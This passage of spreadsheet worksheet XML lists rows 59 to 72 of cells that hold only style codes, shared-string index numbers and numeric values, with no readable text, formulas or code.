      <c r="AI59" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ59" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK59" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL59" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="60" ht="153.75" customHeight="1">
      <c r="B60" s="44" t="s">
        <v>509</v>
      </c>
      <c r="C60" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D60" s="45" t="s">
        <v>521</v>
      </c>
      <c r="E60" s="45" t="s">
        <v>522</v>
      </c>
      <c r="F60" s="55" t="s">
        <v>523</v>
      </c>
      <c r="G60" s="45" t="s">
        <v>524</v>
      </c>
      <c r="H60" s="46" t="s">
        <v>549</v>
      </c>
      <c r="I60" s="46" t="s">
        <v>550</v>
      </c>
      <c r="J60" s="46" t="s">
        <v>551</v>
      </c>
      <c r="K60" s="47">
        <v>1.0</v>
      </c>
      <c r="L60" s="47">
        <v>0.0</v>
      </c>
      <c r="M60" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N60" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O60" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P60" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q60" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R60" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S60" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T60" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U60" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V60" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W60" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X60" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y60" s="52" t="s">
        <v>82</v>
      </c>
      <c r="Z60" s="52">
        <v>2.0</v>
      </c>
      <c r="AA60" s="52">
        <v>10.0</v>
      </c>
      <c r="AB60" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC60" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD60" s="65" t="s">
        <v>552</v>
      </c>
      <c r="AE60" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF60" s="53" t="s">
        <v>553</v>
      </c>
      <c r="AG60" s="65" t="s">
        <v>554</v>
      </c>
      <c r="AH60" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI60" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ60" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK60" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL60" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="61" ht="153.75" customHeight="1">
      <c r="B61" s="44" t="s">
        <v>509</v>
      </c>
      <c r="C61" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D61" s="45" t="s">
        <v>521</v>
      </c>
      <c r="E61" s="45" t="s">
        <v>522</v>
      </c>
      <c r="F61" s="55" t="s">
        <v>523</v>
      </c>
      <c r="G61" s="45" t="s">
        <v>524</v>
      </c>
      <c r="H61" s="46" t="s">
        <v>555</v>
      </c>
      <c r="I61" s="46" t="s">
        <v>550</v>
      </c>
      <c r="J61" s="46" t="s">
        <v>556</v>
      </c>
      <c r="K61" s="47">
        <v>1.0</v>
      </c>
      <c r="L61" s="47">
        <v>0.0</v>
      </c>
      <c r="M61" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N61" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O61" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P61" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q61" s="59">
        <v>2001579.0</v>
      </c>
      <c r="R61" s="50">
        <v>1.0</v>
      </c>
      <c r="S61" s="50">
        <v>1.0</v>
      </c>
      <c r="T61" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U61" s="60">
        <v>2001579.0</v>
      </c>
      <c r="V61" s="51">
        <v>1.0</v>
      </c>
      <c r="W61" s="51">
        <v>1.0</v>
      </c>
      <c r="X61" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y61" s="52" t="s">
        <v>557</v>
      </c>
      <c r="Z61" s="52">
        <v>5.0</v>
      </c>
      <c r="AA61" s="52">
        <v>116126.0</v>
      </c>
      <c r="AB61" s="49" t="s">
        <v>251</v>
      </c>
      <c r="AC61" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD61" s="65" t="s">
        <v>558</v>
      </c>
      <c r="AE61" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF61" s="53" t="s">
        <v>559</v>
      </c>
      <c r="AG61" s="65" t="s">
        <v>560</v>
      </c>
      <c r="AH61" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI61" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ61" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK61" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL61" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="62" ht="153.75" customHeight="1">
      <c r="B62" s="44" t="s">
        <v>509</v>
      </c>
      <c r="C62" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D62" s="45" t="s">
        <v>521</v>
      </c>
      <c r="E62" s="45" t="s">
        <v>522</v>
      </c>
      <c r="F62" s="55" t="s">
        <v>541</v>
      </c>
      <c r="G62" s="45" t="s">
        <v>542</v>
      </c>
      <c r="H62" s="46" t="s">
        <v>561</v>
      </c>
      <c r="I62" s="46" t="s">
        <v>562</v>
      </c>
      <c r="J62" s="46" t="s">
        <v>563</v>
      </c>
      <c r="K62" s="47">
        <v>1.0</v>
      </c>
      <c r="L62" s="47">
        <v>0.0</v>
      </c>
      <c r="M62" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N62" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O62" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P62" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q62" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R62" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S62" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T62" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U62" s="51" t="s">
        <v>351</v>
      </c>
      <c r="V62" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W62" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X62" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y62" s="52" t="s">
        <v>424</v>
      </c>
      <c r="Z62" s="52">
        <v>3.0</v>
      </c>
      <c r="AA62" s="52">
        <v>72.0</v>
      </c>
      <c r="AB62" s="49" t="s">
        <v>251</v>
      </c>
      <c r="AC62" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD62" s="65" t="s">
        <v>564</v>
      </c>
      <c r="AE62" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF62" s="53" t="s">
        <v>565</v>
      </c>
      <c r="AG62" s="65" t="s">
        <v>566</v>
      </c>
      <c r="AH62" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI62" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ62" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK62" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL62" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="63" ht="153.75" customHeight="1">
      <c r="B63" s="44" t="s">
        <v>509</v>
      </c>
      <c r="C63" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D63" s="45" t="s">
        <v>521</v>
      </c>
      <c r="E63" s="45" t="s">
        <v>522</v>
      </c>
      <c r="F63" s="55" t="s">
        <v>541</v>
      </c>
      <c r="G63" s="45" t="s">
        <v>542</v>
      </c>
      <c r="H63" s="46" t="s">
        <v>567</v>
      </c>
      <c r="I63" s="46" t="s">
        <v>550</v>
      </c>
      <c r="J63" s="46" t="s">
        <v>568</v>
      </c>
      <c r="K63" s="47">
        <v>1.0</v>
      </c>
      <c r="L63" s="47">
        <v>0.0</v>
      </c>
      <c r="M63" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N63" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O63" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P63" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q63" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R63" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S63" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T63" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U63" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V63" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W63" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X63" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y63" s="52" t="s">
        <v>82</v>
      </c>
      <c r="Z63" s="52">
        <v>2.0</v>
      </c>
      <c r="AA63" s="52">
        <v>4.0</v>
      </c>
      <c r="AB63" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC63" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD63" s="65" t="s">
        <v>569</v>
      </c>
      <c r="AE63" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF63" s="53" t="s">
        <v>570</v>
      </c>
      <c r="AG63" s="65" t="s">
        <v>571</v>
      </c>
      <c r="AH63" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI63" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ63" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK63" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL63" s="66" t="s">
        <v>572</v>
      </c>
    </row>
    <row r="64" ht="153.75" customHeight="1">
      <c r="B64" s="44" t="s">
        <v>509</v>
      </c>
      <c r="C64" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D64" s="45" t="s">
        <v>521</v>
      </c>
      <c r="E64" s="45" t="s">
        <v>522</v>
      </c>
      <c r="F64" s="55" t="s">
        <v>541</v>
      </c>
      <c r="G64" s="45" t="s">
        <v>542</v>
      </c>
      <c r="H64" s="46" t="s">
        <v>573</v>
      </c>
      <c r="I64" s="46" t="s">
        <v>574</v>
      </c>
      <c r="J64" s="46" t="s">
        <v>575</v>
      </c>
      <c r="K64" s="47">
        <v>1.0</v>
      </c>
      <c r="L64" s="47">
        <v>0.0</v>
      </c>
      <c r="M64" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N64" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O64" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P64" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q64" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R64" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S64" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T64" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U64" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V64" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W64" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X64" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y64" s="52">
        <v>2002749.2002752</v>
      </c>
      <c r="Z64" s="52">
        <v>2.0</v>
      </c>
      <c r="AA64" s="52">
        <v>27.0</v>
      </c>
      <c r="AB64" s="49">
        <v>2002752.2002749</v>
      </c>
      <c r="AC64" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD64" s="65" t="s">
        <v>576</v>
      </c>
      <c r="AE64" s="65" t="s">
        <v>577</v>
      </c>
      <c r="AF64" s="53" t="s">
        <v>170</v>
      </c>
      <c r="AG64" s="46" t="s">
        <v>170</v>
      </c>
      <c r="AH64" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI64" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ64" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK64" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL64" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="65" ht="153.75" customHeight="1">
      <c r="B65" s="44" t="s">
        <v>509</v>
      </c>
      <c r="C65" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D65" s="45" t="s">
        <v>521</v>
      </c>
      <c r="E65" s="45" t="s">
        <v>522</v>
      </c>
      <c r="F65" s="55" t="s">
        <v>541</v>
      </c>
      <c r="G65" s="45" t="s">
        <v>542</v>
      </c>
      <c r="H65" s="46" t="s">
        <v>578</v>
      </c>
      <c r="I65" s="46" t="s">
        <v>579</v>
      </c>
      <c r="J65" s="46" t="s">
        <v>580</v>
      </c>
      <c r="K65" s="47">
        <v>1.0</v>
      </c>
      <c r="L65" s="47">
        <v>0.0</v>
      </c>
      <c r="M65" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N65" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O65" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P65" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q65" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R65" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S65" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T65" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U65" s="60">
        <v>15578.0</v>
      </c>
      <c r="V65" s="51">
        <v>1.0</v>
      </c>
      <c r="W65" s="51">
        <v>4822.0</v>
      </c>
      <c r="X65" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y65" s="52" t="s">
        <v>581</v>
      </c>
      <c r="Z65" s="52">
        <v>3.0</v>
      </c>
      <c r="AA65" s="52">
        <v>4843.0</v>
      </c>
      <c r="AB65" s="49" t="s">
        <v>10</v>
      </c>
      <c r="AC65" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD65" s="65" t="s">
        <v>582</v>
      </c>
      <c r="AE65" s="65" t="s">
        <v>583</v>
      </c>
      <c r="AF65" s="53" t="s">
        <v>170</v>
      </c>
      <c r="AG65" s="46" t="s">
        <v>170</v>
      </c>
      <c r="AH65" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI65" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ65" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK65" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL65" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="66" ht="153.75" customHeight="1">
      <c r="B66" s="44" t="s">
        <v>509</v>
      </c>
      <c r="C66" s="45" t="s">
        <v>584</v>
      </c>
      <c r="D66" s="45" t="s">
        <v>521</v>
      </c>
      <c r="E66" s="45" t="s">
        <v>522</v>
      </c>
      <c r="F66" s="55" t="s">
        <v>585</v>
      </c>
      <c r="G66" s="45" t="s">
        <v>586</v>
      </c>
      <c r="H66" s="46" t="s">
        <v>525</v>
      </c>
      <c r="I66" s="46" t="s">
        <v>587</v>
      </c>
      <c r="J66" s="46" t="s">
        <v>588</v>
      </c>
      <c r="K66" s="47">
        <v>1.0</v>
      </c>
      <c r="L66" s="47">
        <v>0.0</v>
      </c>
      <c r="M66" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N66" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O66" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P66" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q66" s="50">
        <v>2012801.0</v>
      </c>
      <c r="R66" s="50">
        <v>1.0</v>
      </c>
      <c r="S66" s="50">
        <v>39958.0</v>
      </c>
      <c r="T66" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U66" s="51">
        <v>2012801.0</v>
      </c>
      <c r="V66" s="51">
        <v>1.0</v>
      </c>
      <c r="W66" s="51">
        <v>39958.0</v>
      </c>
      <c r="X66" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y66" s="52" t="s">
        <v>589</v>
      </c>
      <c r="Z66" s="52">
        <v>6.0</v>
      </c>
      <c r="AA66" s="52">
        <v>46208.0</v>
      </c>
      <c r="AB66" s="49" t="s">
        <v>10</v>
      </c>
      <c r="AC66" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD66" s="65" t="s">
        <v>590</v>
      </c>
      <c r="AE66" s="65" t="s">
        <v>591</v>
      </c>
      <c r="AF66" s="53" t="s">
        <v>170</v>
      </c>
      <c r="AG66" s="46" t="s">
        <v>170</v>
      </c>
      <c r="AH66" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI66" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ66" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK66" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL66" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="67" ht="153.75" customHeight="1">
      <c r="B67" s="44" t="s">
        <v>509</v>
      </c>
      <c r="C67" s="45" t="s">
        <v>584</v>
      </c>
      <c r="D67" s="45" t="s">
        <v>521</v>
      </c>
      <c r="E67" s="45" t="s">
        <v>522</v>
      </c>
      <c r="F67" s="55" t="s">
        <v>585</v>
      </c>
      <c r="G67" s="45" t="s">
        <v>586</v>
      </c>
      <c r="H67" s="46" t="s">
        <v>525</v>
      </c>
      <c r="I67" s="46" t="s">
        <v>592</v>
      </c>
      <c r="J67" s="46" t="s">
        <v>593</v>
      </c>
      <c r="K67" s="47">
        <v>1.0</v>
      </c>
      <c r="L67" s="47">
        <v>0.0</v>
      </c>
      <c r="M67" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N67" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O67" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P67" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q67" s="50">
        <v>2016897.0</v>
      </c>
      <c r="R67" s="50">
        <v>1.0</v>
      </c>
      <c r="S67" s="50">
        <v>1.0</v>
      </c>
      <c r="T67" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U67" s="51">
        <v>2016897.0</v>
      </c>
      <c r="V67" s="51">
        <v>1.0</v>
      </c>
      <c r="W67" s="51">
        <v>1.0</v>
      </c>
      <c r="X67" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y67" s="52" t="s">
        <v>594</v>
      </c>
      <c r="Z67" s="52">
        <v>3.0</v>
      </c>
      <c r="AA67" s="52">
        <v>16.0</v>
      </c>
      <c r="AB67" s="49" t="s">
        <v>10</v>
      </c>
      <c r="AC67" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD67" s="65" t="s">
        <v>590</v>
      </c>
      <c r="AE67" s="65" t="s">
        <v>595</v>
      </c>
      <c r="AF67" s="53" t="s">
        <v>170</v>
      </c>
      <c r="AG67" s="46" t="s">
        <v>170</v>
      </c>
      <c r="AH67" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI67" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ67" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK67" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL67" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="68" ht="153.75" customHeight="1">
      <c r="B68" s="44" t="s">
        <v>509</v>
      </c>
      <c r="C68" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D68" s="45" t="s">
        <v>596</v>
      </c>
      <c r="E68" s="45" t="s">
        <v>597</v>
      </c>
      <c r="F68" s="55" t="s">
        <v>598</v>
      </c>
      <c r="G68" s="45" t="s">
        <v>599</v>
      </c>
      <c r="H68" s="46" t="s">
        <v>600</v>
      </c>
      <c r="I68" s="46" t="s">
        <v>601</v>
      </c>
      <c r="J68" s="46" t="s">
        <v>602</v>
      </c>
      <c r="K68" s="47">
        <v>1.0</v>
      </c>
      <c r="L68" s="47">
        <v>0.0</v>
      </c>
      <c r="M68" s="48">
        <v>1917.0</v>
      </c>
      <c r="N68" s="48">
        <v>1.0</v>
      </c>
      <c r="O68" s="48">
        <v>8.0</v>
      </c>
      <c r="P68" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q68" s="50">
        <v>1917.0</v>
      </c>
      <c r="R68" s="50">
        <v>1.0</v>
      </c>
      <c r="S68" s="50">
        <v>8.0</v>
      </c>
      <c r="T68" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U68" s="51">
        <v>1917.0</v>
      </c>
      <c r="V68" s="51">
        <v>1.0</v>
      </c>
      <c r="W68" s="51">
        <v>16.0</v>
      </c>
      <c r="X68" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y68" s="52" t="s">
        <v>603</v>
      </c>
      <c r="Z68" s="52">
        <v>5.0</v>
      </c>
      <c r="AA68" s="52">
        <v>21884.0</v>
      </c>
      <c r="AB68" s="49" t="s">
        <v>604</v>
      </c>
      <c r="AC68" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD68" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AE68" s="65" t="s">
        <v>605</v>
      </c>
      <c r="AF68" s="53" t="s">
        <v>606</v>
      </c>
      <c r="AG68" s="46" t="s">
        <v>607</v>
      </c>
      <c r="AH68" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI68" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ68" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK68" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL68" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="69" ht="153.75" customHeight="1">
      <c r="B69" s="44" t="s">
        <v>509</v>
      </c>
      <c r="C69" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D69" s="45" t="s">
        <v>596</v>
      </c>
      <c r="E69" s="45" t="s">
        <v>597</v>
      </c>
      <c r="F69" s="55" t="s">
        <v>598</v>
      </c>
      <c r="G69" s="45" t="s">
        <v>599</v>
      </c>
      <c r="H69" s="46" t="s">
        <v>608</v>
      </c>
      <c r="I69" s="46" t="s">
        <v>609</v>
      </c>
      <c r="J69" s="46" t="s">
        <v>610</v>
      </c>
      <c r="K69" s="47">
        <v>1.0</v>
      </c>
      <c r="L69" s="47">
        <v>0.0</v>
      </c>
      <c r="M69" s="48">
        <v>402.0</v>
      </c>
      <c r="N69" s="48">
        <v>1.0</v>
      </c>
      <c r="O69" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P69" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q69" s="50">
        <v>402.0</v>
      </c>
      <c r="R69" s="50">
        <v>1.0</v>
      </c>
      <c r="S69" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T69" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U69" s="51">
        <v>402.0</v>
      </c>
      <c r="V69" s="51">
        <v>1.0</v>
      </c>
      <c r="W69" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X69" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y69" s="52" t="s">
        <v>611</v>
      </c>
      <c r="Z69" s="52">
        <v>4.0</v>
      </c>
      <c r="AA69" s="52" t="s">
        <v>10</v>
      </c>
      <c r="AB69" s="49" t="s">
        <v>612</v>
      </c>
      <c r="AC69" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD69" s="65" t="s">
        <v>613</v>
      </c>
      <c r="AE69" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF69" s="53" t="s">
        <v>170</v>
      </c>
      <c r="AG69" s="46" t="s">
        <v>170</v>
      </c>
      <c r="AH69" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI69" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ69" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK69" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL69" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="70" ht="153.75" customHeight="1">
      <c r="B70" s="44" t="s">
        <v>509</v>
      </c>
      <c r="C70" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D70" s="45" t="s">
        <v>596</v>
      </c>
      <c r="E70" s="45" t="s">
        <v>597</v>
      </c>
      <c r="F70" s="55" t="s">
        <v>598</v>
      </c>
      <c r="G70" s="45" t="s">
        <v>599</v>
      </c>
      <c r="H70" s="46" t="s">
        <v>608</v>
      </c>
      <c r="I70" s="46" t="s">
        <v>609</v>
      </c>
      <c r="J70" s="46" t="s">
        <v>614</v>
      </c>
      <c r="K70" s="47">
        <v>1.0</v>
      </c>
      <c r="L70" s="47">
        <v>0.0</v>
      </c>
      <c r="M70" s="48">
        <v>402.0</v>
      </c>
      <c r="N70" s="48">
        <v>1.0</v>
      </c>
      <c r="O70" s="48">
        <v>15.0</v>
      </c>
      <c r="P70" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q70" s="50">
        <v>402.0</v>
      </c>
      <c r="R70" s="50">
        <v>1.0</v>
      </c>
      <c r="S70" s="50">
        <v>15.0</v>
      </c>
      <c r="T70" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U70" s="51">
        <v>402.0</v>
      </c>
      <c r="V70" s="51">
        <v>1.0</v>
      </c>
      <c r="W70" s="51">
        <v>30.0</v>
      </c>
      <c r="X70" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y70" s="52" t="s">
        <v>615</v>
      </c>
      <c r="Z70" s="52">
        <v>5.0</v>
      </c>
      <c r="AA70" s="52">
        <v>60221.0</v>
      </c>
      <c r="AB70" s="49">
        <v>2002749.2002752</v>
      </c>
      <c r="AC70" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD70" s="65" t="s">
        <v>613</v>
      </c>
      <c r="AE70" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF70" s="53" t="s">
        <v>170</v>
      </c>
      <c r="AG70" s="46" t="s">
        <v>170</v>
      </c>
      <c r="AH70" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI70" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ70" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK70" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL70" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="71" ht="153.75" customHeight="1">
      <c r="B71" s="44" t="s">
        <v>509</v>
      </c>
      <c r="C71" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D71" s="45" t="s">
        <v>596</v>
      </c>
      <c r="E71" s="45" t="s">
        <v>597</v>
      </c>
      <c r="F71" s="55" t="s">
        <v>598</v>
      </c>
      <c r="G71" s="45" t="s">
        <v>599</v>
      </c>
      <c r="H71" s="46" t="s">
        <v>616</v>
      </c>
      <c r="I71" s="46" t="s">
        <v>609</v>
      </c>
      <c r="J71" s="46" t="s">
        <v>617</v>
      </c>
      <c r="K71" s="47">
        <v>1.0</v>
      </c>
      <c r="L71" s="47">
        <v>0.0</v>
      </c>
      <c r="M71" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N71" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O71" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P71" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q71" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R71" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S71" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T71" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U71" s="51" t="s">
        <v>351</v>
      </c>
      <c r="V71" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W71" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X71" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y71" s="52" t="s">
        <v>342</v>
      </c>
      <c r="Z71" s="52">
        <v>2.0</v>
      </c>
      <c r="AA71" s="52" t="s">
        <v>10</v>
      </c>
      <c r="AB71" s="49" t="s">
        <v>10</v>
      </c>
      <c r="AC71" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD71" s="65" t="s">
        <v>618</v>
      </c>
      <c r="AE71" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF71" s="53" t="s">
        <v>170</v>
      </c>
      <c r="AG71" s="46" t="s">
        <v>170</v>
      </c>
      <c r="AH71" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI71" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ71" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK71" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL71" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="72" ht="153.75" customHeight="1">
      <c r="B72" s="44" t="s">
        <v>509</v>
      </c>
      <c r="C72" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D72" s="45" t="s">
        <v>596</v>
      </c>
      <c r="E72" s="45" t="s">
        <v>597</v>
      </c>
      <c r="F72" s="55" t="s">
        <v>598</v>
      </c>
      <c r="G72" s="45" t="s">
        <v>599</v>
      </c>
      <c r="H72" s="46" t="s">
        <v>619</v>
      </c>
      <c r="I72" s="46" t="s">
        <v>609</v>
      </c>
      <c r="J72" s="46" t="s">
        <v>620</v>
      </c>
      <c r="K72" s="47">
        <v>1.0</v>
      </c>
      <c r="L72" s="47">
        <v>0.0</v>
      </c>
      <c r="M72" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N72" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O72" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P72" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q72" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R72" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S72" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T72" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U72" s="51">
        <v>50447.0</v>
      </c>
      <c r="V72" s="51">
        <v>1.0</v>
      </c>
      <c r="W72" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X72" s="49" t="s">
        <v>10</v>
      </c>
